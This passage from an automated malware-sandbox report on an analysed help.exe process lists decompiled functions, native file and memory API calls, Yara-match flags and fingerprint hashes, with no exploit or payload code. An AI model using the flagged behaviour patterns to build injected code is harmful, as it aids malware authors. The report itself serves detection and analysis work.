                                                                                                        • Instruction ID: 0eb7217eeab8ceb392ce0bbe0836a645f42d82d03ba5b37ccf2dcdb9b08a70f7
                                                                                                        • Opcode Fuzzy Hash: a3d3d3c0123cddb368cc51eab9da9c3aaeeac76cd7bbfae310620ba6f7f49b43
                                                                                                        • Instruction Fuzzy Hash:
                                                                                                        Uniqueness

                                                                                                        Uniqueness Score: -1.00%

                                                                                                        Function 00B5FDDA, Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 42COMMON
                                                                                                        Download Yara Rule
                                                                                                        C-Code - Quality: 53%
                                                                                                        			E00B5FDDA(intOrPtr* __edx, intOrPtr _a4) {
				void* _t7;
				intOrPtr _t9;
				intOrPtr _t10;
				intOrPtr* _t12;
				intOrPtr* _t13;
				intOrPtr _t14;
				intOrPtr* _t15;

				_t13 = __edx;
				_push(_a4);
				_t14 =  *[fs:0x18];
				_t15 = _t12;
				_t7 = E00B0CE00( *__edx,  *((intOrPtr*)(__edx + 4)), 0xff676980, 0xffffffff);
				_push(_t13);
				E00B55720(0x65, 1, "RTL: Enter CriticalSection Timeout (%I64u secs) %d\n", _t7);
				_t9 =  *_t15;
				if(_t9 == 0xffffffff) {
					_t10 = 0;
				} else {
					_t10 =  *((intOrPtr*)(_t9 + 0x14));
				}
				_push(_t10);
				_push(_t15);
				_push( *((intOrPtr*)(_t15 + 0xc)));
				_push( *((intOrPtr*)(_t14 + 0x24)));
				return E00B55720(0x65, 0, "RTL: Pid.Tid %p.%p, owner tid %p Critical Section %p - ContentionCount == %u\n",  *((intOrPtr*)(_t14 + 0x20)));
			}










                                                                                                        0x00b5fdda
                                                                                                        0x00b5fde2
                                                                                                        0x00b5fde5
                                                                                                        0x00b5fdec
                                                                                                        0x00b5fdfa
                                                                                                        0x00b5fdff
                                                                                                        0x00b5fe0a
                                                                                                        0x00b5fe0f
                                                                                                        0x00b5fe17
                                                                                                        0x00b5fe1e
                                                                                                        0x00b5fe19
                                                                                                        0x00b5fe19
                                                                                                        0x00b5fe19
                                                                                                        0x00b5fe20
                                                                                                        0x00b5fe21
                                                                                                        0x00b5fe22
                                                                                                        0x00b5fe25
                                                                                                        0x00b5fe40

                                                                                                        APIs
                                                                                                        • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 00B5FDFA
                                                                                                        Strings
                                                                                                        • RTL: Enter CriticalSection Timeout (%I64u secs) %d, xrefs: 00B5FE01
                                                                                                        • RTL: Pid.Tid %p.%p, owner tid %p Critical Section %p - ContentionCount == %u, xrefs: 00B5FE2B
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000001.00000002.266159838.0000000000AA0000.00000040.00000001.sdmp, Offset: 00AA0000, based on PE: true
                                                                                                        Similarity
                                                                                                        • API ID: Unothrow_t@std@@@__ehfuncinfo$??2@
                                                                                                        • String ID: RTL: Enter CriticalSection Timeout (%I64u secs) %d$RTL: Pid.Tid %p.%p, owner tid %p Critical Section %p - ContentionCount == %u
                                                                                                        • API String ID: 885266447-3903918235
                                                                                                        • Opcode ID: abd9ce0a43d0b17b4f4011faeacd6cbb7c2f24d875385e7d5430a44307b010f8
                                                                                                        • Instruction ID: f36cca451547e70f60d32bbd753c75d5c88285f8e5e1e823eae1a6e2e1af88bb
                                                                                                        • Opcode Fuzzy Hash: abd9ce0a43d0b17b4f4011faeacd6cbb7c2f24d875385e7d5430a44307b010f8
                                                                                                        • Instruction Fuzzy Hash: 8EF0F632200601BFD6201A45DC03F73BF9AEB44731F240395FA28561E2DA62FC6097F0
                                                                                                        Uniqueness

                                                                                                        Uniqueness Score: -1.00%

                                                                                                        Analysis Process: help.exe PID: 5448 Parent PID: 3388 help.exeCOMMON

                                                                                                        Executed Functions

                                                                                                        Function 005781D0, Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 40filenativeCOMMON
                                                                                                        Download Yara Rule
                                                                                                        APIs
                                                                                                        • NtCreateFile.NTDLL(00000060,00000000,.z`,00573BA7,00000000,FFFFFFFF,?,?,FFFFFFFF,00000000,00573BA7,007A002E,00000000,00000060,00000000,00000000), ref: 0057821D
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000006.00000002.477991027.0000000000560000.00000040.00000001.sdmp, Offset: 00560000, based on PE: false
                                                                                                        Yara matches
                                                                                                        Similarity
                                                                                                        • API ID: CreateFile
                                                                                                        • String ID: .z`
                                                                                                        • API String ID: 823142352-1441809116
                                                                                                        • Opcode ID: 19fa48ade07888cfcca4191431b874d7c75bcaabbd4d52727e7364b5df5f6853
                                                                                                        • Instruction ID: 9b09947dbeeebd7993b53fe2514f2c0dd9c36045461dd8c97f145e773d480f6d
                                                                                                        • Opcode Fuzzy Hash: 19fa48ade07888cfcca4191431b874d7c75bcaabbd4d52727e7364b5df5f6853
                                                                                                        • Instruction Fuzzy Hash: E1F0B2B2200208ABCB08CF88DC85EEB77ADAF8C754F158248BA0D97241C630E8118BA4
                                                                                                        Uniqueness

                                                                                                        Uniqueness Score: -1.00%

                                                                                                        Function 00578280, Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 36filenativeCOMMON
                                                                                                        Download Yara Rule
                                                                                                        APIs
                                                                                                        • NtReadFile.NTDLL(?,?,FFFFFFFF,?,?,?,?,?,!:W,FFFFFFFF,?,b=W,?,00000000), ref: 005782C5
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000006.00000002.477991027.0000000000560000.00000040.00000001.sdmp, Offset: 00560000, based on PE: false
                                                                                                        Yara matches
                                                                                                        Similarity
                                                                                                        • API ID: FileRead
                                                                                                        • String ID: !:W
                                                                                                        • API String ID: 2738559852-375975915
                                                                                                        • Opcode ID: 1cb0ad745fa17a6b0f92d1251f92e59420b1dcb8c70dd00eb84f7822971f7938
                                                                                                        • Instruction ID: 638514bbf1cd230c50ec78acd274ba5c798a6d7dd84fb252eb661bb0292680f9
                                                                                                        • Opcode Fuzzy Hash: 1cb0ad745fa17a6b0f92d1251f92e59420b1dcb8c70dd00eb84f7822971f7938
                                                                                                        • Instruction Fuzzy Hash: 09F0A4B2200208ABCB14DF89DC85EEB77ADAF8C754F158249BA1D97241DA30E8118BA0
                                                                                                        Uniqueness

                                                                                                        Uniqueness Score: -1.00%

                                                                                                        Function 005782FD, Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 21nativeCOMMON
                                                                                                        Download Yara Rule
                                                                                                        APIs
                                                                                                        • NtClose.NTDLL(@=W,?,?,00573D40,00000000,FFFFFFFF), ref: 00578325
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000006.00000002.477991027.0000000000560000.00000040.00000001.sdmp, Offset: 00560000, based on PE: false
                                                                                                        Yara matches
                                                                                                        Similarity
                                                                                                        • API ID: Close
                                                                                                        • String ID: @=W
                                                                                                        • API String ID: 3535843008-272422971
                                                                                                        • Opcode ID: 3cfd8d06fa5e8c38716601f3e3d27bc2e12c60dc8be745c18576831407152f3f
                                                                                                        • Instruction ID: 8405713ab6044ad7eb1a4c1123abb36948bb943dc378c9ba241f859ff0fa7e05
                                                                                                        • Opcode Fuzzy Hash: 3cfd8d06fa5e8c38716601f3e3d27bc2e12c60dc8be745c18576831407152f3f
                                                                                                        • Instruction Fuzzy Hash: 68E012752403147BD710EFD4DC4AEE77B68EF88760F158555BE1D9B242C570F91096E0
                                                                                                        Uniqueness

                                                                                                        Uniqueness Score: -1.00%

                                                                                                        Function 00578300, Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 20nativeCOMMON
                                                                                                        Download Yara Rule
                                                                                                        APIs
                                                                                                        • NtClose.NTDLL(@=W,?,?,00573D40,00000000,FFFFFFFF), ref: 00578325
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000006.00000002.477991027.0000000000560000.00000040.00000001.sdmp, Offset: 00560000, based on PE: false
                                                                                                        Yara matches
                                                                                                        Similarity
                                                                                                        • API ID: Close
                                                                                                        • String ID: @=W
                                                                                                        • API String ID: 3535843008-272422971
                                                                                                        • Opcode ID: aa41620b67aec822f8463caeb84bd84f714cc802f2fd34de09a1d76353dd2617
                                                                                                        • Instruction ID: f2463f23762a85a4ca8182f4beecc533bca5f5a3b65aa06d8ece732bfae9f422
                                                                                                        • Opcode Fuzzy Hash: aa41620b67aec822f8463caeb84bd84f714cc802f2fd34de09a1d76353dd2617
                                                                                                        • Instruction Fuzzy Hash: B1D012752402146BD710EF98DC49EA77B5CEF84750F154455BA1C5B242C570F90086E0
                                                                                                        Uniqueness

                                                                                                        Uniqueness Score: -1.00%

                                                                                                        Function 0057827B, Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 19filenativeCOMMON
                                                                                                        Download Yara Rule
                                                                                                        APIs
                                                                                                        • NtCreateFile.NTDLL(00000060,00000000,.z`,00573BA7,00000000,FFFFFFFF,?,?,FFFFFFFF,00000000,00573BA7,007A002E,00000000,00000060,00000000,00000000), ref: 0057821D
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000006.00000002.477991027.0000000000560000.00000040.00000001.sdmp, Offset: 00560000, based on PE: false
                                                                                                        Yara matches
                                                                                                        Similarity
                                                                                                        • API ID: CreateFile
                                                                                                        • String ID: .z`
                                                                                                        • API String ID: 823142352-1441809116
                                                                                                        • Opcode ID: 9e64409247b88fe6b472bb07dfce1deab2a9dd0356c7be9c41a0b9bd585bd4b1
                                                                                                        • Instruction ID: 33d9f51c5924eb26799b4e12777ddabfb8c94bbf2099bf70cfcf590e91469d90
                                                                                                        • Opcode Fuzzy Hash: 9e64409247b88fe6b472bb07dfce1deab2a9dd0356c7be9c41a0b9bd585bd4b1
                                                                                                        • Instruction Fuzzy Hash: 82D0A7752081486FC758CA94AC84CBA7399EB8C220704950DB5ADC7441C13298014760
                                                                                                        Uniqueness

                                                                                                        Uniqueness Score: -1.00%

                                                                                                        Function 005783B0, Relevance: 1.5, APIs: 1, Instructions: 30memorynativeCOMMON
                                                                                                        Download Yara Rule
                                                                                                        APIs
                                                                                                        • NtAllocateVirtualMemory.NTDLL(00000004,00003000,00002000,00000000,?,00562D11,00002000,00003000,00000004), ref: 005783E9
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000006.00000002.477991027.0000000000560000.00000040.00000001.sdmp, Offset: 00560000, based on PE: false
                                                                                                        Yara matches
                                                                                                        Similarity
                                                                                                        • API ID: AllocateMemoryVirtual
                                                                                                        • String ID:
                                                                                                        • API String ID: 2167126740-0
                                                                                                        • Opcode ID: e868ca870ba9ad3aee1a8e1804f154c56992d5df3b6804a08460a29a32ddb2bb
                                                                                                        • Instruction ID: 51d001758bebca68d6d500557bbee53f01a38f1bbdac06e41b64de475d01add0
                                                                                                        • Opcode Fuzzy Hash: e868ca870ba9ad3aee1a8e1804f154c56992d5df3b6804a08460a29a32ddb2bb
                                                                                                        • Instruction Fuzzy Hash: 8CF015B2200218ABCB14DF89DC85EAB77ADAF88750F118149BE0897241C630F810CBB0
                                                                                                        Uniqueness

                                                                                                        Uniqueness Score: -1.00%

                                                                                                        Function 005783AB, Relevance: 1.5, APIs: 1, Instructions: 30memorynativeCOMMON
                                                                                                        Download Yara Rule
                                                                                                        APIs
                                                                                                        • NtAllocateVirtualMemory.NTDLL(00000004,00003000,00002000,00000000,?,00562D11,00002000,00003000,00000004), ref: 005783E9
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000006.00000002.477991027.0000000000560000.00000040.00000001.sdmp, Offset: 00560000, based on PE: false
                                                                                                        Yara matches
                                                                                                        Similarity
                                                                                                        • API ID: AllocateMemoryVirtual
                                                                                                        • String ID:
                                                                                                        • API String ID: 2167126740-0
                                                                                                        • Opcode ID: 4cc73beb567ae9033fc0d7535d6c3c81bbe11e85d382395d0b81b7d81fdfcb1c
                                                                                                        • Instruction ID: 153d4bb92fc51fb6e44c3dc5a471a640b75a6b1421dec11222e7c23036a4ff9b
                                                                                                        • Opcode Fuzzy Hash: 4cc73beb567ae9033fc0d7535d6c3c81bbe11e85d382395d0b81b7d81fdfcb1c
                                                                                                        • Instruction Fuzzy Hash: 18F0F8B5210118ABDB14DF98DC84EEB77A9AF98350F158549BA1997281C631E811CBA0
                                                                                                        Uniqueness

                                                                                                        Uniqueness Score: -1.00%

                                                                                                        Function 02F39A50, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                                                                        Download Yara Rule
                                                                                                        APIs
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000006.00000002.480614738.0000000002ED0000.00000040.00000001.sdmp, Offset: 02ED0000, based on PE: true
                                                                                                        • Associated: 00000006.00000002.481361218.0000000002FEB000.00000040.00000001.sdmp Download File
                                                                                                        • Associated: 00000006.00000002.481376973.0000000002FEF000.00000040.00000001.sdmp Download File
                                                                                                        Similarity
                                                                                                        • API ID: InitializeThunk
                                                                                                        • String ID:
                                                                                                        • API String ID: 2994545307-0
                                                                                                        • Opcode ID: 252aacfe9996d2cbda9048806ed7d33fcbb3133abc9a38eddf75bbd34c2b7ac6
                                                                                                        • Instruction ID: 1f454edd6a54720f51059f5ec8c1c89a670f2b2311fc66ead43ed21385ef2556
                                                                                                        • Opcode Fuzzy Hash: 252aacfe9996d2cbda9048806ed7d33fcbb3133abc9a38eddf75bbd34c2b7ac6
                                                                                                        • Instruction Fuzzy Hash: 3D90026131180042D20065694C14B07140597D0383F51C115A2145594CCD9589616561
                                                                                                        Uniqueness

                                                                                                        Uniqueness Score: -1.00%

                                                                                                        Function 02F39860, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                                                                        Download Yara Rule
                                                                                                        APIs
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000006.00000002.480614738.0000000002ED0000.00000040.00000001.sdmp, Offset: 02ED0000, based on PE: true
                                                                                                        • Associated: 00000006.00000002.481361218.0000000002FEB000.00000040.00000001.sdmp Download File
                                                                                                        • Associated: 00000006.00000002.481376973.0000000002FEF000.00000040.00000001.sdmp Download File
                                                                                                        Similarity
                                                                                                        • API ID: InitializeThunk
                                                                                                        • String ID:
                                                                                                        • API String ID: 2994545307-0
                                                                                                        • Opcode ID: 3644dd7d2815fc07d1cfb0906221c47515767866c2988ea15821b4f9865067ca
                                                                                                        • Instruction ID: f08d9910350c19bf8b4bf60c82955ce00fca0b6a20262b61807a5948f4a26144
                                                                                                        • Opcode Fuzzy Hash: 3644dd7d2815fc07d1cfb0906221c47515767866c2988ea15821b4f9865067ca
                                                                                                        • Instruction Fuzzy Hash: 6090027130100413D11161594504707140997D02C1F91C412A2415598D9AD68A52B161
                                                                                                        Uniqueness

                                                                                                        Uniqueness Score: -1.00%

                                                                                                        Function 02F39840, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                                                                        Download Yara Rule
                                                                                                        APIs
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000006.00000002.480614738.0000000002ED0000.00000040.00000001.sdmp, Offset: 02ED0000, based on PE: true
                                                                                                        • Associated: 00000006.00000002.481361218.0000000002FEB000.00000040.00000001.sdmp Download File
                                                                                                        • Associated: 00000006.00000002.481376973.0000000002FEF000.00000040.00000001.sdmp Download File
                                                                                                        Similarity
                                                                                                        • API ID: InitializeThunk
                                                                                                        • String ID:
                                                                                                        • API String ID: 2994545307-0
                                                                                                        • Opcode ID: 9f640a18b13edc50b8bea6bc8b223d2dee4fa09bb4541f8a1b5157e6abeb8dd2
                                                                                                        • Instruction ID: 9cef84584605ac5c048ff3cb89b0a22a578799e995fdb34993c350b02f3433e2
                                                                                                        • Opcode Fuzzy Hash: 9f640a18b13edc50b8bea6bc8b223d2dee4fa09bb4541f8a1b5157e6abeb8dd2
                                                                                                        • Instruction Fuzzy Hash: 18900261342041525545B15944045075406A7E02C1791C012A3405990C89A69956E661
                                                                                                        Uniqueness

                                                                                                        Uniqueness Score: -1.00%

                                                                                                        Function 02F399A0, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                                                                        Download Yara Rule
                                                                                                        APIs
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000006.00000002.480614738.0000000002ED0000.00000040.00000001.sdmp, Offset: 02ED0000, based on PE: true
                                                                                                        • Associated: 00000006.00000002.481361218.0000000002FEB000.00000040.00000001.sdmp Download File
                                                                                                        • Associated: 00000006.00000002.481376973.0000000002FEF000.00000040.00000001.sdmp Download File
                                                                                                        Similarity
                                                                                                        • API ID: InitializeThunk
                                                                                                        • String ID:
                                                                                                        • API String ID: 2994545307-0
                                                                                                        • Opcode ID: 3d3e2e6bb94d326cc988162717c3edb69f3b75bc5515fdcbbe4a6b8588042011
                                                                                                        • Instruction ID: 0a4c6f80aee01540b8e029cec8cb18f178ff98b26bbd96d1a21bac9d9d20d473
                                                                                                        • Opcode Fuzzy Hash: 3d3e2e6bb94d326cc988162717c3edb69f3b75bc5515fdcbbe4a6b8588042011
                                                                                                        • Instruction Fuzzy Hash: 019002A134100442D10061594414B071405D7E1381F51C015E3055594D8A99CD527166
                                                                                                        Uniqueness

                                                                                                        Uniqueness Score: -1.00%

                                                                                                        Function 02F39910, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                                                                        Download Yara Rule
                                                                                                        APIs
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000006.00000002.480614738.0000000002ED0000.00000040.00000001.sdmp, Offset: 02ED0000, based on PE: true
                                                                                                        • Associated: 00000006.00000002.481361218.0000000002FEB000.00000040.00000001.sdmp Download File
                                                                                                        • Associated: 00000006.00000002.481376973.0000000002FEF000.00000040.00000001.sdmp Download File
                                                                                                        Similarity
                                                                                                        • API ID: InitializeThunk
                                                                                                        • String ID:
                                                                                                        • API String ID: 2994545307-0
                                                                                                        • Opcode ID: 4282d1ba51f274c799bb9be651dc1442778dc6d177a18147103821e03ff07c0a
                                                                                                        • Instruction ID: 84d5a7c1cd816ea1863d56c2caada322bdd9f67befbf6fe2274844c32fd36840
                                                                                                        • Opcode Fuzzy Hash: 4282d1ba51f274c799bb9be651dc1442778dc6d177a18147103821e03ff07c0a
                                                                                                        • Instruction Fuzzy Hash: 5C9002B130100402D14071594404747140597D0381F51C011A7055594E8AD98ED576A5
                                                                                                        Uniqueness

                                                                                                        Uniqueness Score: -1.00%

                                                                                                        Function 02F396E0, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                                                                        Download Yara Rule
                                                                                                        APIs
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000006.00000002.480614738.0000000002ED0000.00000040.00000001.sdmp, Offset: 02ED0000, based on PE: true
                                                                                                        • Associated: 00000006.00000002.481361218.0000000002FEB000.00000040.00000001.sdmp Download File
                                                                                                        • Associated: 00000006.00000002.481376973.0000000002FEF000.00000040.00000001.sdmp Download File
                                                                                                        Similarity
                                                                                                        • API ID: InitializeThunk
                                                                                                        • String ID:
                                                                                                        • API String ID: 2994545307-0
                                                                                                        • Opcode ID: 2e388aebae1987f5cdb6b9c2e6a31e2f7434467f4cfb4ce0f724e6d84707e1aa
                                                                                                        • Instruction ID: bfd0f2cfb206296dd2042af5627e519a4caa13b10d39570b43d11a4eb2058f4d
                                                                                                        • Opcode Fuzzy Hash: 2e388aebae1987f5cdb6b9c2e6a31e2f7434467f4cfb4ce0f724e6d84707e1aa
                                                                                                        • Instruction Fuzzy Hash: D190027130108802D1106159840474B140597D0381F55C411A6415698D8AD589917161
                                                                                                        Uniqueness

                                                                                                        Uniqueness Score: -1.00%

                                                                                                        Function 02F396D0, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                                                                        Download Yara Rule
                                                                                                        APIs
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000006.00000002.480614738.0000000002ED0000.00000040.00000001.sdmp, Offset: 02ED0000, based on PE: true
                                                                                                        • Associated: 00000006.00000002.481361218.0000000002FEB000.00000040.00000001.sdmp Download File
                                                                                                        • Associated: 00000006.00000002.481376973.0000000002FEF000.00000040.00000001.sdmp Download File
                                                                                                        Similarity
                                                                                                        • API ID: InitializeThunk
                                                                                                        • String ID:
                                                                                                        • API String ID: 2994545307-0
                                                                                                        • Opcode ID: f1e5d6f7da1ed1f8a4f632128f5a2ad828d6131436da7944c63010c653face9e
                                                                                                        • Instruction ID: dee5a1b316d3b231419931f352938ee6a857a2d3f5b2125c88e1faf60c43e16d
                                                                                                        • Opcode Fuzzy Hash: f1e5d6f7da1ed1f8a4f632128f5a2ad828d6131436da7944c63010c653face9e
                                                                                                        • Instruction Fuzzy Hash: E390027130100842D10061594404B47140597E0381F51C016A2115694D8A95C9517561
                                                                                                        Uniqueness

                                                                                                        Uniqueness Score: -1.00%

                                                                                                        Function 02F39660, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                                                                        Download Yara Rule
                                                                                                        APIs
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000006.00000002.480614738.0000000002ED0000.00000040.00000001.sdmp, Offset: 02ED0000, based on PE: true
                                                                                                        • Associated: 00000006.00000002.481361218.0000000002FEB000.00000040.00000001.sdmp Download File
                                                                                                        • Associated: 00000006.00000002.481376973.0000000002FEF000.00000040.00000001.sdmp Download File
                                                                                                        Similarity
                                                                                                        • API ID: InitializeThunk
                                                                                                        • String ID:
                                                                                                        • API String ID: 2994545307-0
                                                                                                        • Opcode ID: ffc14ca2db9480c6a4dd80339bb8d3371e56883aafe7d012b210a0eeb5fa7981
                                                                                                        • Instruction ID: b6097ee94e2b02813334a34bb9f487843f9812a737fbcc5c9016df7f91c87e28
                                                                                                        • Opcode Fuzzy Hash: ffc14ca2db9480c6a4dd80339bb8d3371e56883aafe7d012b210a0eeb5fa7981
                                                                                                        • Instruction Fuzzy Hash: B590027130100802D1807159440464B140597D1381F91C015A2016694DCE958B5977E1
                                                                                                        Uniqueness

                                                                                                        Uniqueness Score: -1.00%

                                                                                                        Function 02F39650, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                                                                        Download Yara Rule
                                                                                                        APIs
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000006.00000002.480614738.0000000002ED0000.00000040.00000001.sdmp, Offset: 02ED0000, based on PE: true
                                                                                                        • Associated: 00000006.00000002.481361218.0000000002FEB000.00000040.00000001.sdmp Download File
                                                                                                        • Associated: 00000006.00000002.481376973.0000000002FEF000.00000040.00000001.sdmp Download File
                                                                                                        Similarity
                                                                                                        • API ID: InitializeThunk
                                                                                                        • String ID:
                                                                                                        • API String ID: 2994545307-0
                                                                                                        • Opcode ID: 48ac8130f9f719f6d7bef6a0109d1d2c35d60e93191b8398eeb7d7aaab60b736
                                                                                                        • Instruction ID: b78140aacee4876de40a2d7105a486b5203764109099eddb1941e65b2d06e2fd
                                                                                                        • Opcode Fuzzy Hash: 48ac8130f9f719f6d7bef6a0109d1d2c35d60e93191b8398eeb7d7aaab60b736
                                                                                                        • Instruction Fuzzy Hash: 1D90027130504842D14071594404A47141597D0385F51C011A20556D4D9AA58E55B6A1
                                                                                                        Uniqueness

                                                                                                        Uniqueness Score: -1.00%

                                                                                                        Function 02F39FE0, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                                                                        Download Yara Rule
                                                                                                        APIs
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000006.00000002.480614738.0000000002ED0000.00000040.00000001.sdmp, Offset: 02ED0000, based on PE: true
                                                                                                        • Associated: 00000006.00000002.481361218.0000000002FEB000.00000040.00000001.sdmp Download File
                                                                                                        • Associated: 00000006.00000002.481376973.0000000002FEF000.00000040.00000001.sdmp Download File
                                                                                                        Similarity
                                                                                                        • API ID: InitializeThunk
                                                                                                        • String ID:
                                                                                                        • API String ID: 2994545307-0
                                                                                                        • Opcode ID: 9d5d6f13172bb7689c045599dbe28ad55878519e50f8dd93cf5e7e330f58e36d
                                                                                                        • Instruction ID: 2f784a436a1962472cae908d7b5d8d070e645450aae6e8c940c7fccea74c92a7
                                                                                                        • Opcode Fuzzy Hash: 9d5d6f13172bb7689c045599dbe28ad55878519e50f8dd93cf5e7e330f58e36d
                                                                                                        • Instruction Fuzzy Hash: AB90027131114402D11061598404707140597D1281F51C411A2815598D8AD589917162
                                                                                                        Uniqueness

                                                                                                        Uniqueness Score: -1.00%

                                                                                                        Function 02F39780, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                                                                        Download Yara Rule
                                                                                                        APIs
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000006.00000002.480614738.0000000002ED0000.00000040.00000001.sdmp, Offset: 02ED0000, based on PE: true
                                                                                                        • Associated: 00000006.00000002.481361218.0000000002FEB000.00000040.00000001.sdmp Download File
                                                                                                        • Associated: 00000006.00000002.481376973.0000000002FEF000.00000040.00000001.sdmp Download File
                                                                                                        Similarity
                                                                                                        • API ID: InitializeThunk
                                                                                                        • String ID:
                                                                                                        • API String ID: 2994545307-0
                                                                                                        • Opcode ID: 6e8f5c76fe5aab03293372af329c52eaab6b9b306e582eaa69b6c385c33fb56d
                                                                                                        • Instruction ID: a46291bfa172932c27291cb5a236caa71cb73d455549845d5776e849e6ca6a99
                                                                                                        • Opcode Fuzzy Hash: 6e8f5c76fe5aab03293372af329c52eaab6b9b306e582eaa69b6c385c33fb56d
                                                                                                        • Instruction Fuzzy Hash: DC90026931300002D1807159540860B140597D1282F91D415A2006598CCD9589696361
                                                                                                        Uniqueness

                                                                                                        Uniqueness Score: -1.00%

                                                                                                        Function 02F39710, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                                                                        Download Yara Rule
                                                                                                        APIs
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000006.00000002.480614738.0000000002ED0000.00000040.00000001.sdmp, Offset: 02ED0000, based on PE: true
                                                                                                        • Associated: 00000006.00000002.481361218.0000000002FEB000.00000040.00000001.sdmp Download File
                                                                                                        • Associated: 00000006.00000002.481376973.0000000002FEF000.00000040.00000001.sdmp Download File
                                                                                                        Similarity
                                                                                                        • API ID: InitializeThunk
                                                                                                        • String ID:
                                                                                                        • API String ID: 2994545307-0
                                                                                                        • Opcode ID: 2cec892915eda6a585762a0f57706d204a551a17eab75ac28a08d7a0f2ebfa32
                                                                                                        • Instruction ID: e99e16bd8f292eed8728cb6f0cd67456eb551675d603e94688789c8273e5e3ac
                                                                                                        • Opcode Fuzzy Hash: 2cec892915eda6a585762a0f57706d204a551a17eab75ac28a08d7a0f2ebfa32
                                                                                                        • Instruction Fuzzy Hash: A690027130100402D10065995408647140597E0381F51D011A7015595ECAE589917171
                                                                                                        Uniqueness

                                                                                                        Uniqueness Score: -1.00%

                                                                                                        Function 02F395D0, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                                                                        Download Yara Rule
                                                                                                        APIs
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000006.00000002.480614738.0000000002ED0000.00000040.00000001.sdmp, Offset: 02ED0000, based on PE: true
                                                                                                        • Associated: 00000006.00000002.481361218.0000000002FEB000.00000040.00000001.sdmp Download File
                                                                                                        • Associated: 00000006.00000002.481376973.0000000002FEF000.00000040.00000001.sdmp Download File
                                                                                                        Similarity
                                                                                                        • API ID: InitializeThunk
                                                                                                        • String ID:
                                                                                                        • API String ID: 2994545307-0
                                                                                                        • Opcode ID: 100868361a63a6ddff882fc972206955d6faf19dd7e3db6626e902cdb5fa6a0f
                                                                                                        • Instruction ID: 402a854d0c2609f71ce343aa3f4ef39f0d51aeb50562389b82116ee965aed81a
                                                                                                        • Opcode Fuzzy Hash: 100868361a63a6ddff882fc972206955d6faf19dd7e3db6626e902cdb5fa6a0f
                                                                                                        • Instruction Fuzzy Hash: 589002A130200003410571594414617540A97E0281B51C021E30055D0DC9A589917165
                                                                                                        Uniqueness

                                                                                                        Uniqueness Score: -1.00%

                                                                                                        Function 02F39540, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                                                                        Download Yara Rule
                                                                                                        APIs
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000006.00000002.480614738.0000000002ED0000.00000040.00000001.sdmp, Offset: 02ED0000, based on PE: true
                                                                                                        • Associated: 00000006.00000002.481361218.0000000002FEB000.00000040.00000001.sdmp Download File
                                                                                                        • Associated: 00000006.00000002.481376973.0000000002FEF000.00000040.00000001.sdmp Download File
                                                                                                        Similarity
                                                                                                        • API ID: InitializeThunk
                                                                                                        • String ID:
                                                                                                        • API String ID: 2994545307-0
                                                                                                        • Opcode ID: c3f87cc7316224d9b1517aafd3e33b7ce1fa169919fe8dcf768ceaac5e8555f8
                                                                                                        • Instruction ID: 44c93c1721afd7d408d84be43c084d77551f77ae3d51ef64a65637f236ee057a
                                                                                                        • Opcode Fuzzy Hash: c3f87cc7316224d9b1517aafd3e33b7ce1fa169919fe8dcf768ceaac5e8555f8
                                                                                                        • Instruction Fuzzy Hash: 1A900265311000030105A5590704507144697D53D1351C021F3006590CDAA189616161
                                                                                                        Uniqueness

                                                                                                        Uniqueness Score: -1.00%

                                                                                                        Function 00567216, Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 82threadwindowCOMMON
                                                                                                        Download Yara Rule
                                                                                                        APIs
                                                                                                        • PostThreadMessageW.USER32(0065002E,00000111,00000000,00000000,00000000), ref: 005672CA
                                                                                                        • PostThreadMessageW.USER32(0065002E,00008003,00000000,?,00000000), ref: 005672EB
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000006.00000002.477991027.0000000000560000.00000040.00000001.sdmp, Offset: 00560000, based on PE: false
                                                                                                        Yara matches
                                                                                                        Similarity
                                                                                                        • API ID: MessagePostThread
                                                                                                        • String ID: 3333
                                                                                                        • API String ID: 1836367815-2924271548
